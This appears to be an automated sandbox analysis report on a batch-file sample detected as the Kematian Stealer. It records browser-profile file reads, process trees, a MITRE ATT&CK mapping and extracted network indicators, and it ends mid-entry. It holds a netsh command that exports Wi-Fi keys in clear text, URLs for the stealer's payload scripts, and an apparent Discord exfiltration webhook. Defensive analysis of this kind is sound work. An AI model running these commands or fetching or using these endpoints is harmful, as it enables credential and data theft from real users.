            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clearJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\Browser Data\cookies_netscape_Chrome.txtJump to behavior
            Source: Yara matchFile source: 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7296, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\kematian.ps1, type: DROPPED

            Remote Access Functionality

            Source: Yara match | File source: 0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
            MITRE ATT&CK Matrix (techniques grouped by tactic column; the numeric badges rendered before technique names are kept as shown)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: 32 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: 831 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 2 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: 32 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: 1 Disable or Modify Tools; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 341 Virtualization/Sandbox Evasion; 11 Process Injection
            Credential Access: 2 OS Credential Dumping; 1 Credentials In Files; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: 2 File and Directory Discovery; 23 System Information Discovery; 841 Security Software Discovery; 1 Process Discovery; 341 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: 1 Archive Collected Data; 31 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
            Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; 1 Proxy; Multiband Communication; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
            Behavior Graph ID: 1467953, Sample: pirates.bat, Startdate: 05/07/2024, Architecture: WINDOWS, Score: 100

            Top-level network: raw.githubusercontent.com; ip-api.com; 4 other IPs or domains
            Top-level signatures: Malicious sample detected (through community Yara rule); Yara detected Kematian Stealer; Yara detected PowerShell ScreenShot; 6 other signatures

            Process tree (as drawn in the graph):
            cmd.exe
              dropped: C:\Users\user\Desktop\temp.vbs, ASCII
              signatures: Suspicious powershell command line found; Command shell drops VBS files; Bypasses PowerShell execution policy; 2 other signatures
              cscript.exe
                cmd.exe
                  powershell.exe
                    signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); 7 other signatures
                  powershell.exe
                    network: ip-api.com 208.95.112.1, 63771, 80 TUT-ASUS United States; www.cloudflare.com 104.16.123.96, 443, 49737, 63770 CLOUDFLARENETUS United States
                    signatures: Loading BitLocker PowerShell Module; Uses netsh to dump wireless credentials
                    powershell.exe
                      network: objects.githubusercontent.com 185.199.111.133, 443, 63780 FASTLYUS Netherlands
                      signatures: Found Tor onion address; Tries to harvest and steal browser information (history, passwords, etc)
                    powershell.exe
                      network: github.com 140.82.121.3, 443, 63775, 63777 GITHUBUS United States
                      dropped: C:\Users\user\AppData\...\hvw5rqqp.cmdline, Unicode
                      csc.exe
                        dropped: C:\Users\user\AppData\Local\...\hvw5rqqp.dll, PE32
                        cvtres.exe
                    WmiPrvSE.exe
                    netsh.exe
                  powershell.exe
                    network: raw.githubusercontent.com 185.199.110.133, 443, 49730, 63776 FASTLYUS Netherlands
                    dropped: C:\Users\user\Desktop\kematian.ps1, ASCII
                    signatures: Found many strings related to Crypto-Wallets (likely being stolen)
                  29 other processes
                    net1.exe
              conhost.exe

            Source | Detection | Scanner | Label | Link
            pirates.bat | 3% | ReversingLabs | |
            pirates.bat | 3% | Virustotal | | Browse
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            www.cloudflare.com | 0% | Virustotal | | Browse
            github.com | 0% | Virustotal | | Browse
            raw.githubusercontent.com | 0% | Virustotal | | Browse
            ip-api.com | 0% | Virustotal | | Browse
            objects.githubusercontent.com | 1% | Virustotal | | Browse
            171.39.242.20.in-addr.arpa | 1% | Virustotal | | Browse
            Source | Detection | Scanner | Label | Link
            http://ip-api.com/json | 0% | URL Reputation | safe |
            https://contoso.com/License | 0% | URL Reputation | safe |
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe |
            https://contoso.com/ | 0% | URL Reputation | safe |
            https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
            http://ip-api.com | 0% | URL Reputation | safe |
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
            http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
            http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe |
            http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
            http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
            http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
            https://go.micro | 0% | URL Reputation | safe |
            https://contoso.com/Icon | 0% | URL Reputation | safe |
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | URL Reputation | safe |
            http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
            https://aka.ms/pscore68 | 0% | URL Reputation | safe |
            http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe |
            https://www.cloudflare.com/cdn-cgi/trace | 0% | Avira URL Cloud | safe |
            https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1 | 0% | Avira URL Cloud | safe |
            http://www.microsoft.cv | 0% | Avira URL Cloud | safe |
            http://crl.microsoft | 0% | Avira URL Cloud | safe |
            https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 | 0% | Avira URL Cloud | safe |
            https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1 | 0% | Avira URL Cloud | safe |
            https://github.com | 0% | Avira URL Cloud | safe |
            https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 | 0% | Virustotal | | Browse
            https://www.cloudflare.com/cdn-cgi/trace | 0% | Virustotal | | Browse
            https://github.cg | 0% | Avira URL Cloud | safe |
            https://raw.githubusercontent.c | 0% | Avira URL Cloud | safe |
            https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 | 0% | Avira URL Cloud | safe |
            http://crl.microsoft | 0% | Virustotal | | Browse
            https://github.cg | 0% | Virustotal | | Browse
            http://github.com | 0% | Avira URL Cloud | safe |
            https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1 | 0% | Virustotal | | Browse
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1 | 0% | Avira URL Cloud | safe |
            https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 | 0% | Virustotal | | Browse
            https://github.com | 0% | Virustotal | | Browse
            https://oneget.orgX | 0% | Avira URL Cloud | safe |
            http://www.microsoft.cv | 0% | Virustotal | | Browse
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 | 0% | Avira URL Cloud | safe |
            http://github.com | 0% | Virustotal | | Browse
            https://discord.X | 0% | Avira URL Cloud | safe |
            https://aka.ms/winsvr-2022-pshelp | 0% | Avira URL Cloud | safe |
            https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1 | 0% | Avira URL Cloud | safe |
            https://aka.ms/winsvr-2022-pshelpX | 0% | Avira URL Cloud | safe |
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1 | 0% | Virustotal | | Browse
            https://raw.githubusercont | 0% | Avira URL Cloud | safe |
            http://www.microsoft. | 0% | Avira URL Cloud | safe |
            https://www.cloudflare.com | 0% | Avira URL Cloud | safe |
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 | 0% | Virustotal | | Browse
            https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
            https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1 | 1% | Virustotal | | Browse
            https://aka.ms/winsvr-2022-pshelp | 0% | Virustotal | | Browse
            https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834 | 0% | Avira URL Cloud | safe |
            https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin | 0% | Avira URL Cloud | safe |
            http://crl.mh | 0% | Avira URL Cloud | safe |
            https://www.cloudflare.com | 0% | Virustotal | | Browse
            https://github.com/Pester/Pester | 1% | Virustotal | | Browse
            https://github.com/TheWover | 0% | Avira URL Cloud | safe |
            http://www.microsoft. | 2% | Virustotal | | Browse
            https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvx | 0% | Avira URL Cloud | safe |
            https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1 | 0% | Avira URL Cloud | safe |
            https://objects.githubusercontent.com | 0% | Avira URL Cloud | safe |
            https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834 | 1% | Virustotal | | Browse
            https://raw.githubusercontent.com | 0% | Avira URL Cloud | safe |
            https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1 | 0% | Virustotal | | Browse
            https://github.com/TheWover | 0% | Virustotal | | Browse
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 | 0% | Avira URL Cloud | safe |
            https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin | 0% | Virustotal | | Browse
            https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvx | 0% | Virustotal | | Browse
            https://objects.githubusercontent.com | 1% | Virustotal | | Browse
            http://raw.githubusercontent.com | 0% | Avira URL Cloud | safe |
            https://raw.githubusercontent.com | 0% | Virustotal | | Browse
            https://github.com/Somali-Devs/Kematian-Stealer | 0% | Avira URL Cloud | safe |
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js | 0% | Avira URL Cloud | safe |
            https://oneget.org | 0% | Avira URL Cloud | safe |
            https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 | 0% | Virustotal | | Browse
            http://crl.mh | 0% | Virustotal | | Browse
            http://raw.githubusercontent.com | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.cloudflare.com | 104.16.123.96 | true | false | (none) | unknown
github.com | 140.82.121.3 | true | true | (none) | unknown
raw.githubusercontent.com | 185.199.110.133 | true | true | (none) | unknown
ip-api.com | 208.95.112.1 | true | true | (none) | unknown
objects.githubusercontent.com | 185.199.111.133 | true | false | (none) | unknown
171.39.242.20.in-addr.arpa | unknown | unknown | true | (none) | unknown
Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://www.cloudflare.com/cdn-cgi/trace | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 | true | (none) | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name / Source / Malicious / Antivirus Detection / Reputation

Name: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1
Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: http://www.microsoft.cv
Source: powershell.exe, 00000028.00000002.2909000081.0000017E802B9000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: http://crl.microsoft
Source: powershell.exe, 00000028.00000002.2902014674.0000017E80199000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1
Source: powershell.exe, 0000002C.00000002.2100725567.00000201C8F76000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://github.com
Source: powershell.exe, 0000002C.00000002.2105443989.00000201CBAED000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: http://ip-api.com/json
Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://contoso.com/License
Source: powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://github.cg
Source: powershell.exe, 00000030.00000002.2636336709.000002A872D27000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://raw.githubusercontent.c
Source: powershell.exe, 00000014.00000002.1765711117.000001EC4713E000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: powershell.exe, 00000030.00000002.2331375157.000000C000247000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://github.com
Source: powershell.exe, 0000002C.00000002.2105443989.00000201CBF9B000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1
Source: powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://contoso.com/
Source: powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://nuget.org/nuget.exe
Source: powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC48591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1947001037.0000029E4A244000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3BB45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAB46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC350000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://ip-api.com
Source: powershell.exe, 00000028.00000002.2928167979.0000017EE8586000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://oneget.orgX
Source: powershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.1765711117.000001EC46CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE02764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CA991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85A781000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://discord.X
Source: powershell.exe, 00000014.00000002.1765711117.000001EC470EC000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC48591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1947001037.0000029E4A244000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3BB45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAB46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC350000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000028.00000002.2928167979.0000017EE8586000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 0%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1
Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: 1%, Virustotal; Avira URL Cloud: safe
Reputation: unknown

Name: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000024.00000002.1885695376.0000029E3AF3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A3F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmp
